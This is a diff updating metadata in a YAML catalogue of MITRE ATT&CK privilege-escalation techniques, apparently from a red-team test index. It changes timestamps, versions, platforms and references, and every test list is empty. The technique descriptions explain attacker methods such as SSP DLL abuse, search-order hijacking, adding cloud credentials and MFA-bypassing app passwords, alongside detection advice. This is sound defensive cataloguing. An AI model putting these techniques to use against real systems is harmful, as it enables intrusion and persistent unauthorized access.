         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17517,7 +17845,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17547,7 +17874,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17574,7 +17902,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17600,13 +17928,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17683,12 +18009,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17707,6 +18032,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -17714,7 +18040,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -17734,34 +18059,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -17797,6 +18124,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -17808,16 +18139,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -17853,12 +18180,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -17866,14 +18193,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -17888,6 +18214,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -17896,18 +18223,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -17939,9 +18266,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18013,7 +18337,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18040,7 +18363,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18066,13 +18389,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18193,12 +18514,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18230,11 +18550,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18275,11 +18594,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18335,12 +18653,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18397,7 +18714,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18467,7 +18783,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18577,7 +18892,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -18631,7 +18945,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18664,13 +18978,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18732,10 +19044,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -18793,7 +19104,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -18835,7 +19145,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -18894,8 +19204,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.005:
     technique:
@@ -18925,7 +19233,7 @@ privilege-escalation:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -18960,12 +19268,10 @@ privilege-escalation:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19042,7 +19348,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1055.004:
@@ -19081,7 +19386,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:23:46.476Z'
       name: 'Process Injection: Asynchronous Procedure Call'
       description: "Adversaries may inject malicious code into processes via the asynchronous
         procedure call (APC) queue in order to evade process-based defenses as well
@@ -19130,8 +19435,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.004
     atomic_tests: []
   T1546.009:
@@ -19163,7 +19466,7 @@ privilege-escalation:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19211,13 +19514,11 @@ privilege-escalation:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19230,16 +19531,16 @@ privilege-escalation:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -19251,16 +19552,16 @@ privilege-escalation:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -19315,7 +19616,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.002:
     technique:
@@ -19338,7 +19638,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:21:11.178Z'
       name: 'Process Injection: Portable Executable Injection'
       description: "Adversaries may inject portable executables (PE) into processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19382,8 +19682,6 @@ privilege-escalation:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.002
     atomic_tests: []
   T1547.015:
@@ -19460,7 +19758,7 @@ privilege-escalation:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -19488,8 +19786,6 @@ privilege-escalation:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1134.001:
@@ -19548,23 +19844,22 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.001
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -19574,11 +19869,15 @@ privilege-escalation:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -19589,12 +19888,19 @@ privilege-escalation:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -19603,6 +19909,7 @@ privilege-escalation:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
